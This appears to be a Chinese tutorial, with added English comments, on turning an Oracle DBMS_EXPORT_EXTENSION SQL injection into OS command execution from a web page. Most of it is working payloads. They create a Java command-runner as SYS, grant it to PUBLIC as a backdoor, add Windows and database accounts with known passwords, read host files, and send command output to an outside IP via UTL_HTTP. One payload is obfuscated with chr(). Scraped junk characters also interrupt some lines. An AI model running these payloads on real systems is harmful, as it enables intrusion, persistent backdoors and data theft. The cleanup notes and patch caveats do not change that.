
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用 'a'|| 是为了让条件恒为 true：这里只需要子查询被执行一次以触发副作用，并不关心它的返回值。)
语句有点长，而且里面含有 +、% 等在 URL 中有特殊含义的字符 (未编码的 + 会被解码成空格)，需要做 URL 编码，可能要用 POST 提交。
安全说明：DBMS_EXPORT_EXTENSION 的这个注入点是 Oracle 在 2006 年 1 月的关键补丁更新 (CPU) 中就已修复的老漏洞 (CVE-2006-0265)，打过补丁的版本不受影响；以下步骤仅用于授权测试和理解原理，并且会在数据库里留下持久的对象和权限变更，测完必须按文末的步骤清理。
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数 (它的第三个参数会被拼进一段以 SYS 身份执行的动态 PL/SQL，所以能以 SYS 身份执行任意 DDL)，在 Oracle 上创建 Java 包 LinxUtil，里面两个函数：runCMD 用于执行系统命令，readFile 用于读取文件。注意 runCMD 只读取子进程的标准输出，不读标准错误，也没有等待子进程结束，命令执行失败时往往只得到空串而不是错误信息：
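-- Step 1: use SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to create the Java
-- source "LinxUtil" in the SYS schema. The third argument is spliced into PL/SQL that
-- the package builds and runs as SYS: the leading `"` closes a quoted identifier in
-- that generated statement, the nested EXECUTE IMMEDIATE runs our DDL inside an
-- autonomous transaction, and the trailing `--` comments out whatever the package
-- appends. Quotes are doubled once per nesting level ('' / '''').
-- runCMD(args): runs `args` with Runtime.exec() and returns its stdout with "\n"
--   appended to each line; stderr is not read and the process is not waited for.
--   On exception the exception text is returned instead of output.
-- readFile(filename): returns the file's lines joined with "\n", or the exception text.
-- The '1'<>'a'||(...) wrapper only keeps the WHERE condition true; the subquery's
-- value is irrelevant. When sent as a URL/POST parameter, `+` (which decodes to a
-- space) and other reserved characters in the Java source must be URL-encoded.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)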
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
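-- Step 1 (short form): identical to the full payload above but the Java class only
-- defines runCMD(args) — readFile is omitted to keep the request shorter. runCMD
-- returns the command's stdout (one "\n" per line) or the exception text; stderr is
-- not captured. Same SYS-level injection mechanism and quote-doubling as before.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)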
同时把后面步骤中提到的对 readFile() 的处理语句 (第 3 步创建 LinxReadFile、第 4 步对它授权) 去掉。
------------------------------
2.赋Java权限
(这一步把 java.io.FilePermission <<ALL FILES>> execute 授予 PUBLIC，是数据库里持久的、面向所有用户的权限变更；清理时要用 dbms_java.revoke_permission 撤销，后面的"删除"步骤没有包含它。)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
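-- Step 3a: expose LinxUtil.runCMD as the PL/SQL function SYS.LinxRunCMD(p_cmd).
-- The function is created in the SYS schema, so whoever is later granted EXECUTE
-- runs OS commands on the database host through it. The innermost string
-- (the Java call spec) sits three levels deep, hence ''''''''.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual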
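-- Step 3b: expose LinxUtil.readFile as SYS.LinxReadFile(filename). Skip this
-- statement if the short (runCMD-only) Java source from step 1 was used, since
-- the class then has no readFile method. Note the return type is VARCHAR2, which
-- is why later checks compare it against '1' rather than the number 1.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual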
4.赋public执行函数的权限
(grant all ... to public 之后，任何能登录这个数据库的账号都可以调用 SYS.LinxRunCMD 在数据库服务器上执行系统命令，等于留下一个后门；测试结束务必撤销并删除。)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual' s5 T9 {5 x/ I" z- Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# g4 {# [& c9 D. x1 k
5.测试上面的几步是否成功 (以下两个条件分别检查 LINXRUNCMD、LINXREADFILE 是否已经出现在 all_objects 中，对象存在时条件为真)
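-- Step 5: boolean checks that the two functions now exist. Each scalar subquery
-- yields the OBJECT_ID when the object is present and NULL when it is not;
-- '1'<>NULL evaluates to UNKNOWN, so the condition is false exactly when the
-- object is missing. The original wrote '1'<>'11'||(...) for the first check,
-- but '11'||NULL is '11' in Oracle, so that form was true whether or not
-- LINXRUNCMD existed and could not detect a failed step 3. Unquoted identifiers
-- are stored upper-case, hence 'LINXRUNCMD' / 'LINXREADFILE'.
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)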
6.执行命令:
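-- Step 6: run an OS command through SYS.LinxRunCMD. This example adds a local
-- Windows account "linx" (no password is set). The condition '1'<>(output) is
-- true whenever the command produced any output; the command runs regardless
-- of how the condition evaluates.
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)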
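-- Read a file on the database host through SYS.LinxReadFile. LinxReadFile
-- returns VARCHAR2, so the comparison must be against the string '1', not the
-- number 1 (see the note below). c:/boot.ini only exists on older Windows hosts.
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)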
  
注意 sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union (union 后面的列数和列类型必须与页面原来的查询一致，否则 Oracle 会报 ORA-01789，什么也看不到)：
4 w8 l' M: B/ N0 h/ S1 ~/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带外发送到自己控制的主机 (示例中的 211.71.147.3 是接收端地址，使用时要换成自己的)：
4 r# e6 N( ]5 Q' F4 j9 X0 L/xxx.jsp?id=1 and '1'<>( * J  a  j. G7 u3 R7 C) k, z! }( c4 M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual5 c2 M3 s  b& u0 I% [
)
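-- Same out-of-band channel for file contents. As above, newlines are replaced
-- via CHR(10) because '\n' is not an escape sequence in Oracle SQL. The query
-- parameter is still labelled LinxRunCMD in the original; it is only a tag for
-- the receiving script and can be renamed freely.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),CHR(10),'%0A')) FROM dual
)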
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换成 %20、%0A，否则 URL 不合法，无法提交 http request。换行符要写成 CHR(10)：Oracle 的字符串字面量不处理反斜杠转义，'\n' 只是反斜杠和 n 两个普通字符，替换不到 Java 代码里 "\n" 产生的真正换行符。用 utl_encode.base64_encode 也可以，但它的输入输出都是 RAW，需要配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2 使用。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 里的变化 (Java 源对象是用带引号的名字 "LinxUtil" 创建的，大小写被保留，所以要同时匹配 '%LINX%' 和 '%Linx%')：
7 i( y$ _. u! ~7 O0 D, _select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  l9 L! @, \: Z( ~7 K: j/ S
7.删除我们创建的函数 (原文只删了 LinxRunCMD；LinxReadFile、Java 源 "LinxUtil"、第 2 步授予 PUBLIC 的 Java 文件权限也都还在，完整清理时要一并撤销/删除，否则后门一直存在)
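-- Step 7: cleanup. The original only dropped LinxRunCMD; the other artefacts
-- created above are removed here as well so no backdoor is left behind:
--   1. drop function LinxRunCMD   (the PUBLIC grant on it goes away with it)
--   2. drop function LinxReadFile (skip if it was never created)
--   3. drop java source "LinxUtil" (drops the derived class too)
--   4. revoke the java.io.FilePermission <<ALL FILES>> execute grant from PUBLIC
-- Each statement reuses the same SYS-level injection wrapper as above.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop java source "LinxUtil"'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual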
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
创建 Oracle 帐号 (注意这会在数据库里留下一个口令为 linxsql 的真实账号，测完必须删除)：
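-- Alternative proof of the vulnerability: create a database user LINXSQL
-- (password linxsql) through the same SYS-level injection. This is a persistent,
-- attacker-known credential on the target; drop it as soon as the test is done.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual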
即 (用 chr() 拼出同一条语句的等价写法，整条语句里不含单引号)：
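-- The same CREATE USER injection with every argument assembled from chr(), so
-- the statement contains no quote characters at all. Decoded, the arguments are
-- 'FOO', 'BAR', then
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- followed by 'SYS', 0, '1', 0. The quotes are doubled one level less than in
-- the literal form above, because chr() builds the runtime string directly
-- instead of going through an outer SQL string literal.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual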
确定漏洞存在 (检查 all_users 里是否出现了 LINXSQL；user_id 是数字，所以这里用 1<> 而不是 '1'<>)：
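-- Verify the CREATE USER took effect: the scalar subquery returns LINXSQL's
-- numeric user_id when the account exists and NULL otherwise, so 1<>NULL is
-- UNKNOWN (false) only when the user is missing. user_id is a NUMBER, hence the
-- numeric 1 on the left; unquoted user names are stored upper-case.
1<>(
select user_id from all_users where username='LINXSQL'
)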
给 linxsql 连接权限：
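-- Give the new account the CONNECT role so it can actually log in. Together
-- with the known password this is a working backdoor account; drop it after
-- the test (see below).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual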
删除帐号：
" D, h: S& z* x, y$ `; L" Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ k" P( g6 J# ]1 u) }4 Tdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功的话返回数值 "1"。但它是 authid current_user (调用者权限)，p 里的语句用的是调用者而不是 SYS 的权限，可能仅仅是 public 权限，作用似乎不大；真的要用的话可以考虑先用上面的注入方式 grant dba to 当前的 User。另外 execute immediate 一次只能执行一条语句，要一次执行多条需要把它们包在一个 begin ... end; 块里传进去。
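-- Create SYS.Linx_query(p): runs the statement p with EXECUTE IMMEDIATE and
-- returns 1 on success (an error propagates as an exception). It is declared
-- AUTHID CURRENT_USER, so p runs with the caller's privileges rather than SYS's.
-- EXECUTE IMMEDIATE accepts a single SQL statement or one PL/SQL block, so pass
-- an anonymous BEGIN ... END; block to run several statements in one call.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)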